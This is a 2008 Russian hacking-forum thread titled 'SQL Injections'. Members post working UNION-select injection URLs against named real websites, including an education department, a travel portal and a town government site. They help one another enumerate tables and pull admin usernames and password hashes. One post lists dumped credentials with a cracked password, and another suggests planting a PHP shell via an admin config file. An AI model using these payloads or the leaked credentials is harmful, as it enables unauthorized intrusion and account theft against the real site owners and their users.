SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,3,3,4,5,6/*
    дальше не могу :(
    -------------
    http://www.variant-billiard.ru/news.php?id=-13+union+select+1,2,3,4,5/*
    Версия MySQL

    http://www.variant-billiard.ru/news.php?id=-13+union+select+1,2,3,VERSION(),5/*
    USER
    http://www.variant-billiard.ru/news.php?id=-13+union+select+1,2,3,USER(),5/*
    База Данных
    http://www.variant-billiard.ru/news.php?id=-13+union+select+1,2,3,DATABASE(),5/*
    ----------------------------------
    вот еще одна, только я не логаняю что дальше

    http://www.theenemy.com/news.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11/*
    --------------------------------
    http://post-dvor.ru/news.php?id=-13+union+select+1,2,3,4/*
    версия MySQL 4.0.27-log 3
    --------------------------
    http://www.budd-pni.com/news.php?ID=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* :confused:
    --------------------------
    :D
     
    #6381 SeNaP, 25 Aug 2008
    Last edited: 25 Aug 2008
    2 people like this.
  2. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Давай поможем :)

    Code:
    http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,unhex(hex(version())),3,4,5,6/*
    version() - 4.1.15-standard
    user() - [email protected]
    database() - tartanarmy_cms :)

    Также докрутим
    Таблички:
    Code:
    http://www.rdi-cam.com/pic.php?i=-33+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables/*
    и
    Code:
    http://www.rdi-cam.com/pic.php?i=-33+union+select+1,concat_ws(version(),user(),database()),3,4,5,6,7,8/*
    Все в твоих руках. Главное - пробовать :) Удачи ;)
     
    #6382 USAkid, 26 Aug 2008
    Last edited: 26 Aug 2008
    1 person likes this.
  3. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    спасибо :)
     
  4. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Вот еще SQL

    http://www.mayorlukes.com/news.php?id=-13+union+select+1,2,3,4,5,6,7--
    -----------------
    Таблица USERS
    http://www.mayorlukes.com/news.php?id=-13+union+select+1,2,table_name,4,5,6,7+from+INFORMATION_SCHEMA.TABLES--

    а как её просмотреть!? :confused:

    потскажите и покажите пожалуйсто :)
     
  5. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Code:
    http://www.mayorlukes.com/news.php?id=-13+union+select+1,2,name,4,5,6,7+from+users+limit+2,1--
    и пересматривай лимитом :)

    Добавляю:
    e-mail админа: [email protected]
    админка: http://www.mayorlukes.com/administrator/admin.php

    еше кое-что интересное: Provided by DLG Results. Оф. сайт - http://www.dlgresults.com/
    остаеца узнать пасс и залезть внутрь )...
     
    #6385 USAkid, 26 Aug 2008
    Last edited: 26 Aug 2008
  6. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    USAkid, спасибо :)
     
  7. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Для спасибо есть плюсики :D :D :D
     
    1 person likes this.
  8. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    :D
     
  9. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    SeNaP
    версия 4.
    рут..


    4 ver..


     
    #6389 sabe, 26 Aug 2008
    Last edited: 26 Aug 2008
  10. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    sabe, а что вот это "unhex(hex" :) ?
     
    1 person likes this.
  11. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    вот нашол SQL инж

    http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,table_name,7+from+INFORMATION_SCHEMA.TABLES+limit+19,1/* таблица "админ" , а как её вскрыть? :?
     
  12. 4p3

    4p3 Elder - Старейшина

    Joined:
    18 Aug 2008
    Messages:
    142
    Likes Received:
    30
    Reputations:
    0


    Если фильтрует кавычки, то используй вместо 'admin'
    0x61646d696e. Это тоже самое, но в hex.

    Как вариант можешь использовать SIPT 4.0, она делает всю рутинную работу.

    Вот что получилось выдрать с базы

     
  13. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    User:website@localhost
    Version:4.1.20 (((
    Dbname:website
     
  14. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Ух ты... Сайт какого-то департамента образования

    Code:
    http://www.dosakh.ru/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11+from+mos_users--
    admin:6672984060ab7eb061aa87cc089e761b (MD5)

    расшифровать неполучилось(... Если кто сможет - отпишите :)

    Идем далее:
    Code:
    http://www.dosakh.ru/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat_ws(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11--
    version() - 4.1.22
    user() - dosakhru
    database() - [email protected]

    Зайдя на главную админки написано:
    Разработка: Воробьев И.К.
    Клева он сайты делает :D
     
  15. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    4p3, чтот я не смог самостоятельно открыть таблицу admin
     
  16. serfertty

    serfertty Guest

    Reputations:
    0
    Смотри и учись юный падаван
    065b34a51dd6819e14c87d580055ac42:e7- хэш админа нагел так
    Code:
    http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,admin_password,7+from+admin/*
    Перебирая
    Code:
    http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,column_name,7+from+INFORMATION_SCHEMA.columns+where+table_name=0x61646d696e+limit+5,1/*
    Вот и все там кстати было мыло админа.
     
  17. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Турпортал.... Еб..м и наслаждаемся!

    http://www.argoturas.lt/index.php?lng=en&action=page&id=-1+union+select+concat(0x3a3a,user_login,0x3a3a,user_password),null,null+from+sys_user+limit+0,1

    http://www.argoturas.lt/admin/

    В админке, через файл конфига есть возможность выполнения php кода. -> дописываем, шелим и тп...
     
  18. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    городишко кокойто..есть даже Wanted))
    http://www.town.madison.wi.us/admin/

    bill:RbILYS.h/oJD6
    ltwcal:Rb6tYJLLkwwfM
    gregory:RbccLVAoMKun.
    bloom:Rbsf/mIEnfcgY
    rose:Rbt1QrY2Izgkg:works4me
    schwass:RbpTOUCiVsWOk
     
    1 person likes this.
  19. dr.Pilulkin

    dr.Pilulkin Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    http://www.itcdc.com/explore.php?p=22+limit+0+union+select+1,2,concat_ws(char(58),username,password),4+from+itc.users+limit+1,1/*

    admin:bc5f1dcf127870a3d1acaf8a0ef99f11
     
  20. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    http://hack-shop.org.ru/tools-code-encode

    SQL Hex + 0x | Path
     
Thread Status:
Not open for further replies.